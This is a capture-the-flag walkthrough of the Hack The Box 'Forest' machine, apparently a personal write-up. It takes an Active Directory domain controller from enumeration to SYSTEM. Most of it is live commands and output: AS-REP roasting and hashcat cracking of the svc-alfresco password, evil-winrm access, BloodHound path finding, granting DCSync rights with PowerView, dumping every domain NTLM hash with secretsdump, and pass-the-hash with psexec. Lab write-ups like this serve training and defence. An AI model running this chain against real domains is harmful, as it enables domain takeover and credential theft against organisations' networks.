Forest
Contents
Ports scan
u505@kali:~/HTB/Machines/Forest$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.161
Starting masscan 1.0.5 at 2020-04-04 03:15:26 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 50266/udp on 10.10.10.161 Discovered open port 49664/tcp on 10.10.10.161 Discovered open port 9389/tcp on 10.10.10.161 Discovered open port 49677/tcp on 10.10.10.161 Discovered open port 5985/tcp on 10.10.10.161 Discovered open port 88/tcp on 10.10.10.161 Discovered open port 3268/tcp on 10.10.10.161 Discovered open port 53/tcp on 10.10.10.161 Discovered open port 49665/tcp on 10.10.10.161 Discovered open port 464/tcp on 10.10.10.161 Discovered open port 139/tcp on 10.10.10.161 Discovered open port 63775/udp on 10.10.10.161 Discovered open port 389/tcp on 10.10.10.161 Discovered open port 49684/tcp on 10.10.10.161 Discovered open port 49676/tcp on 10.10.10.161 Discovered open port 49706/tcp on 10.10.10.161 Discovered open port 47001/tcp on 10.10.10.161 Discovered open port 49157/udp on 10.10.10.161 Discovered open port 3269/tcp on 10.10.10.161 Discovered open port 445/tcp on 10.10.10.161 Discovered open port 49667/tcp on 10.10.10.161 Discovered open port 49666/tcp on 10.10.10.161 Discovered open port 593/tcp on 10.10.10.161 Discovered open port 49670/tcp on 10.10.10.161 Discovered open port 135/tcp on 10.10.10.161 Discovered open port 636/tcp on 10.10.10.161 Discovered open port 65342/udp on 10.10.10.161
Masscan detected WRMI port open. This port it's not in the nmap list of usual ports.
u505@kali:~/HTB/Machines/Forest$ nmap -sC -sV 10.10.10.161 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-03 23:16 EDT Nmap scan report for forest.htb (10.10.10.161) Host is up (0.061s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 53/tcp open domain? 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-04 03:26:55Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: mean: 2h30m36s, deviation: 4h02m31s, median: 10m34s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: FOREST | NetBIOS computer name: FOREST\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: FOREST.htb.local |_ System time: 2020-04-03T20:29:19-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-04-04T03:29:20 |_ start_date: 2020-04-04T03:23:27
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 288.23 seconds
Domain Enumeration
smbclient
u505@kali:~/HTB/Machines/Forest$ smbclient -L \\10.10.10.161 Enter WORKGROUP\u505's password: Anonymous login successful
Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available
No information from smbclient in anonymous mode.
Nullinux
I didn't include the full output, but we enumerate users.
u505@kali:~/HTB/Machines/Forest$ python /opt/utils/nullinux/nullinux.py 10.10.10.161 ... u505@kali:~/HTB/Machines/Forest$ cat ./nullinux_users.txt $331000-VK4ADACQNUCA Administrator andy DefaultAccount Guest HealthMailbox0659cc1 HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64 HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad HealthMailboxfd87238 krbtgt lucinda mark santi sebastien SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b svc-alfresco EXCH01$ FOREST$ $D31000-NSEL5BRJ63V7 Exchange Servers Exchange Trusted Subsystem Service Accounts
Nmap doesn't find shares.
u505@kali:~/HTB/Machines/Forest$ nmap -p 445 --script=smb-enum-shares 10.10.10.161 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-03 23:29 EDT Nmap scan report for forest.htb (10.10.10.161) Host is up (0.28s latency).
PORT STATE SERVICE 445/tcp open microsoft-ds
Host script results: | smb-enum-shares: | note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED) | account_used: <blank> | \\10.10.10.161\ADMIN$: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED | Anonymous access: <none> | \\10.10.10.161\C$: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED | Anonymous access: <none> | \\10.10.10.161\IPC$: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED | Anonymous access: READ | \\10.10.10.161\NETLOGON: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED |_ Anonymous access: <none>
Nmap done: 1 IP address (1 host up) scanned in 237.24 seconds
Enum4linux
I didn't paste the full output.
u505@kali:~/HTB/Machines/Forest$ enum4linux 10.10.10.161 ... ==================================================== | Password Policy Information for 10.10.10.161 | ====================================================
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.10.161)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB [+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7 [+] Password history length: 24 [+] Maximum password age: 41 days 23 hours 53 minutes [+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set
The account lockout threshold is set to none, it means that we can brute force users.
Impacket GetADUsers
Perhaps the faster way to list the users.
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/GetADUsers.py -all -dc-ip 10.10.10.161 HTB.local/ Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation
[*] Querying 10.10.10.161 for information about domain. Name Email PasswordLastSet LastLogon -------------------- ------------------------------ ------------------- ------------------- Administrator Administrator@htb.local 2019-09-18 13:09:08.342879 2019-10-07 06:57:07.299606 Guest <never> <never> DefaultAccount <never> <never> krbtgt 2019-09-18 06:53:23.467452 <never> $331000-VK4ADACQNUCA <never> <never> SM_2c8eef0a09b545acb SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local <never> <never> SM_ca8c2ed5bdab4dc9b SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local <never> <never> SM_75a538d3025e4db9a SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local <never> <never> SM_681f53d4942840e18 DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local <never> <never> SM_1b41c9286325456bb Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local <never> <never> SM_9b69f1b9d2cc45549 FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local <never> <never> SM_7c96b981967141ebb SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local <never> <never> SM_c75ee099d0a64c91b SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.local <never> <never> SM_1ffab36a2f5f479cb SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.local <never> <never> HealthMailboxc3d7722 HealthMailboxc3d7722415ad41a5b19e3e00e165edbe@htb.local 2019-09-23 18:51:31.892097 2019-09-23 18:57:12.361516 HealthMailboxfc9daad HealthMailboxfc9daad117b84fe08b081886bd8a5a50@htb.local 2019-09-23 18:51:35.267114 2019-09-23 18:52:05.736012 HealthMailboxc0a90c9 HealthMailboxc0a90c97d4994429b15003d6a518f3f5@htb.local 2019-09-19 07:56:35.206329 <never> HealthMailbox670628e HealthMailbox670628ec4dd64321acfdf6e67db3a2d8@htb.local 2019-09-19 07:56:45.643993 <never> HealthMailbox968e74d HealthMailbox968e74dd3edb414cb4018376e7dd95ba@htb.local 2019-09-19 07:56:56.143969 <never> HealthMailbox6ded678 HealthMailbox6ded67848a234577a1756e072081d01f@htb.local 2019-09-19 07:57:06.597012 <never> HealthMailbox83d6781 HealthMailbox83d6781be36b4bbf8893b03c2ee379ab@htb.local 2019-09-19 07:57:17.065809 <never> HealthMailboxfd87238 HealthMailboxfd87238e536e49e08738480d300e3772@htb.local 2019-09-19 07:57:27.487679 <never> HealthMailboxb01ac64 HealthMailboxb01ac647a64648d2a5fa21df27058a24@htb.local 2019-09-19 07:57:37.878559 <never> HealthMailbox7108a4e HealthMailbox7108a4e350f84b32a7a90d8e718f78cf@htb.local 2019-09-19 07:57:48.253341 <never> HealthMailbox0659cc1 HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.local 2019-09-19 07:57:58.643994 <never> sebastien 2019-09-19 20:29:59.544725 2019-09-22 18:29:29.586227 lucinda 2019-09-19 20:44:13.233891 <never> svc-alfresco 2020-04-04 00:38:27.636686 2019-09-23 07:09:47.931194 andy 2019-09-22 18:44:16.291082 <never> mark 2019-09-20 18:57:30.243568 <never> santi 2019-09-20 19:02:55.134828 <never>
Ldap browsing
With Jxplorer we can visualize the AD structure, but because we are not authenticated we see only some entries, but it allows us to enumerate users.
ASREPRoast
The script GetNPUsers.py from impacket queries target domain for users with 'Do not require Kerberos preauthentication' set and export their TGTs for cracking.
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/GetNPUsers.py -dc-ip 10.10.10.161 HTB.local/ Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation
Name MemberOf PasswordLastSet LastLogon UAC ------------ ------------------------------------------------------ -------------------------- -------------------------- -------- svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2020-04-04 00:44:13.449814 2019-09-23 07:09:47.931194 0x410200
The user svc-alfresco has the "Do not require Kerberos preauthentication" set.
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/GetNPUsers.py -dc-ip 10.10.10.161 -request HTB.local/ Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation
Name MemberOf PasswordLastSet LastLogon UAC ------------ ------------------------------------------------------ -------------------------- -------------------------- -------- svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2020-04-04 00:46:07.497215 2019-09-23 07:09:47.931194 0x410200
$krb5asrep$23$svc-alfresco@HTB.LOCAL:d0432c58661d960a39f33c2b604d2d3e$508588cf6c2eaa5e63d3edf3a434131873f7f7e18a481d6cae77434e3dc59a3d5f8bcf3e8adecc5a8431295168863967e367fe3718352ab37012d09b1fa11cdaf350ea05b5e4297bc847b17e805df6427caf080f124df31d55c0838b1b684838a286f1ab450b2d78aa569494500136bcdd78ff521036e55f14cb0b952fe94f3dd67d932a14ab6b380529cf606a940e04f92302a1f432815f3c061f861d328f1131df41ae80e921569513f87ecc85b868c71884a1bd674d860a0872133d6016dbf87cba9de50db62b306890da0de6ab5db9120853e28f43153f83822f2076794eacdc84fc787c
If we request a ticket, the script extract the hash.
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/GetNPUsers.py -dc-ip 10.10.10.161 -request HTB.local/ -outputfile NPuser.hash Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation
Name MemberOf PasswordLastSet LastLogon UAC ------------ ------------------------------------------------------ -------------------------- -------------------------- -------- svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2020-04-04 00:48:00.778369 2020-04-04 00:47:13.028523 0x410200
We request a ticket and write the output to a file to pass it to hashcat.
u505@kali:~/HTB/Machines/Forest$ hashcat --help | grep Kerberos
7500 | Kerberos 5 AS-REQ Pre-Auth etype 23 | Network Protocols
13100 | Kerberos 5 TGS-REP etype 23 | Network Protocols
18200 | Kerberos 5 AS-REP etype 23 | Network Protocols
The mode is 18200
u505@kali:~/HTB/Machines/Forest$ hashcat -m 18200 NPuser.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hashcat (v5.1.0) starting...
* Device #2: Not a native Intel OpenCL runtime. Expect massive speed loss. You can use --force to override, but do not report related errors. nvmlDeviceGetFanSpeed(): Not Supported
OpenCL Platform #1: NVIDIA Corporation ====================================== * Device #1: GeForce GTX 960M, 501/2004 MB allocatable, 5MCU
OpenCL Platform #2: The pocl project ==================================== * Device #2: pthread-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, skipped.
Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1
Applicable optimizers: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected. This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance. If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Temperature abort trigger set to 90c
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=500 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll' * Device #1: Kernel m18200_a0-pure.c6dafc9b.kernel not found in cache! Building may take a while...
Dictionary cache hit: * Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt * Passwords.: 14344384 * Bytes.....: 139921497 * Keyspace..: 14344384
$krb5asrep$23$svc-alfresco@HTB.LOCAL:d6c4eec7a0867035ce3311b9c97e827c$4d98cdce450c8d4a0211655b226cce3d3ac88d9d57d1ff8da8708cda4916f3615344039074fb188fbabfc06a33f976b8adf3d98a65fd98fa4df87e351083c5bb57b8c7855bd826a487e9295024744a020eee3dd16426b4dafdb33817197fa8665880c52bafa16a0889177f2c8ed8199cdc7e4302314fc30f62150201135da7b5d7d23a7296386053a4b368981e41556bb2851bc79dd22097c09a73652455cd1dba3d4623c21e062c8f5d13f24be5874db33a623fc96ec794a94f573a7ac67cbf811ee6e92af262fb0ae6bc2addfe06cc74a41453dfb1c7861a14af977fc3be7e1be352dd0bc5:s3rvice
Session..........: hashcat Status...........: Cracked Hash.Type........: Kerberos 5 AS-REP etype 23 Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:d6c4eec7a08670...dd0bc5 Time.Started.....: Sat Apr 4 00:41:20 2020 (2 secs) Time.Estimated...: Sat Apr 4 00:41:22 2020 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 3251.5 kH/s (10.86ms) @ Accel:256 Loops:1 Thr:64 Vec:1 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 4096000/14344384 (28.55%) Rejected.........: 0/4096000 (0.00%) Restore.Point....: 4014080/14344384 (27.98%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: sand3y -> s/n/o/o/p/y/ Hardware.Mon.#1..: Temp: 44c Util: 39% Core:1032MHz Mem:2505MHz Bus:16
Started: Sat Apr 4 00:41:13 2020 Stopped: Sat Apr 4 00:41:22 2020
Hashcat cracks the svc-alfresco user password.
svc-alfresco@HTB.LOCAL s3rvice
User Flag
With svc-alfresco credentials we can bind the AD LDAP with a enhanced visibility. It allows us to enumerate groups.
svc-alfresco is member of the Service Accounts group.
The group Service Accounts is member of the group Priviligied IT Accounts, and this Group is member of group Remote Management Users. That means svc-alfresco should be able to execute Windows remote management (winrm) commands, and we saw from masscan that the winrm port was accessible.
u505@kali:~/HTB/Machines/Forest$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami htb\svc-alfresco *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd .. *Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 9/23/2019 2:16 PM 32 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cat user.txt <USER_FLAG>
Elevation of privileges
WinPEAS
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload winPEAS.exe Info: Uploading winPEAS.exe to C:\Users\svc-alfresco\Documents\winPEAS.exe
Data: 321536 bytes of 321536 bytes copied
Info: Upload successful! *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> .\winPEAS.exe
I ran WinPEAS, but I didn't find useful information.
Bloodhound
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment.
Turn on the neo4j database
We start the graph database.
u505@kali:~$ sudo neo4j console Active database: graph.db Directories in use: home: /usr/share/neo4j config: /usr/share/neo4j/conf logs: /usr/share/neo4j/logs plugins: /usr/share/neo4j/plugins import: /usr/share/neo4j/import data: /usr/share/neo4j/data certificates: /usr/share/neo4j/certificates run: /usr/share/neo4j/run Starting Neo4j. WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual. 2020-04-04 23:18:25.463+0000 INFO ======== Neo4j 3.5.3 ======== 2020-04-04 23:18:25.470+0000 INFO Starting... 2020-04-04 23:18:27.001+0000 INFO Bolt enabled on 127.0.0.1:7687. 2020-04-04 23:18:28.157+0000 INFO Started. 2020-04-04 23:18:28.885+0000 INFO Remote interface available at http://localhost:7474/
Log with default credentials (neo4j/neo4j)
Password changed.
Start Bloodhound
u505@kali:/opt/utils/BloodHound/BloodHound-linux-x64$ ./BloodHound
Gather information with Sharphound
Sharphound collects data to feed the graph utility.
u505@kali:~/HTB/Machines/Forest$ cp /opt/utils/BloodHound/Ingestors/SharpHound.exe ./
Form the target
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.exe Info: Uploading SharpHound.exe to C:\Users\svc-alfresco\Documents\SharpHound.exe
Data: 1110016 bytes of 1110016 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> .\SharpHound.exe --CollectionMethod all --Domain htb.local --ldapusername svc-alfresco --ldappassword s3rvice ---------------------------------------------- Initializing SharpHound at 7:51 PM on 4/5/2020 ----------------------------------------------
Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain HTB.LOCAL using path CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL [+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS Status: 0 objects finished (+0) -- Using 21 MB RAM Status: 123 objects finished (+123 61.5)/s -- Using 28 MB RAM Enumeration finished in 00:00:02.4856263 Compressing data to .\20200404173254_BloodHound.zip You can upload this file directly to the UI
SharpHound Enumeration Completed at 7:51 PM on 4/5/2020! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/4/2020 5:32 PM 15124 20200404173254_BloodHound.zip -a---- 4/4/2020 5:32 PM 23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin -a---- 4/4/2020 5:28 PM 832512 SharpHound.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20200404173254_BloodHound.zip Info: Downloading C:\Users\svc-alfresco\Documents\20200404173254_BloodHound.zip to 20200404173254_BloodHound.zip
Info: Download successful!
Graph path to Domain admins
The generated file is processed by Bloodhound.
We search the path to own the Domian Admins
Bloodhound proposal is
- svc-alfresco user is member of group Account operator -> The members of the group ACCOUNT OPERATORS@HTB.LOCAL have GenericAll privileges to the group EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL.
- The members of the group EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL have permissions to modify the DACL (Discretionary Access Control List) on the domain HTB.LOCAL. -> To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges.
User member of group EXCHANGE WINDOWS PERMISSIONS
We create our own user.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user /add u505 <PASS> The command completed successfully.
The addition of the user to group Domain Admins triggers an Access denied.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group /add "Domain Admins" u505 net.exe : System error 5 has occurred. + CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError
Access is denied.
From Microsoft doc (https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-accountoperators)
The Account Operators group grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers.
Members of the Account Operators group cannot manage the Administrator user account, the user accounts of administrators, or the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Members of this group cannot modify user rights.
We add our user to the Exchange Windows Permissions group.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group /add "Exchange Windows Permissions" u505 The command completed successfully.
And to the Remote Management Users to be able to Evil-winrm with this user.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" /add u505 The command completed successfully.
We check our new user.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user u505 User name u505 Full Name Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never
Password last set 4/5/2020 8:48:45 PM Password expires 5/17/2020 8:48:45 PM Password changeable 4/6/2020 8:48:45 PM Password required Yes User may change password Yes
Workstations allowed All Logon script User profile Home directory Last logon Never
Logon hours allowed All
Local Group Memberships *Remote Management Use Global Group memberships *Exchange Windows Perm*Domain Users The command completed successfully.
WriteDacl DCSync privilege
Log with our user.
u505@kali:~/HTB/Machines/Forest$ evil-winrm -i 10.10.10.161 -u u505 -p <PASS>
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
As Bloodhound abuse tab indicates, we creates User credentials.
*Evil-WinRM* PS C:\Users\u505\Documents> $SecPassword = ConvertTo-SecureString '<PASS>' -AsPlainText -Force *Evil-WinRM* PS C:\Users\u505\Documents> $Cred = New-Object System.Management.Automation.PSCredential('HTB.LOCAL\u505', $SecPassword) *Evil-WinRM* PS C:\Users\u505\Documents> $Cred
UserName Password -------- -------- HTB.LOCAL\u505 System.Security.SecureString
To execute Add-DomainObjectAcl command we need the PowerView script.
u505@kali:~/HTB/Machines/Forest$ cp /opt/utils/PowerSploit/Recon/PowerView.ps1 ./
We upload it to the target.
*Evil-WinRM* PS C:\Users\u505\Documents> upload PowerView.ps1 Info: Uploading PowerView.ps1 to C:\Users\u505\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\u505\Documents> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\u505\Documents> Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity u505 -Rights DCSync
Dump hashes
We dump NTLM hashes (-just-dc-ntlm avoid kerberos keys dump)
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/secretsdump.py -dc-ip 10.10.10.161 -just-dc-ntlm u505@10.10.10.161 Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation
Password: [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f::: htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44::: htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05::: htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a::: htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9::: htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555::: htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5::: htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff::: htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203::: htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355::: htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536::: htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc::: htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3::: htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668::: htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b::: htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7::: htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072::: u505:7601:aad3b435b51404eeaad3b435b51404ee:aa693a555524c4d32c19701a0187a1fd::: FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:3475df7cb6fac4d18d3c38cc0fc0b362::: EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1::: [*] Cleaning up...
Access as administrator
We have the admonsitrator's hash, so we can access directly by psexec.
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161 Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161..... [*] Found writable share ADMIN$ [*] Uploading file SgKAtGFA.exe [*] Opening SVCManager on 10.10.10.161..... [*] Creating service KPmZ on 10.10.10.161..... [*] Starting service KPmZ..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami nt authority\system
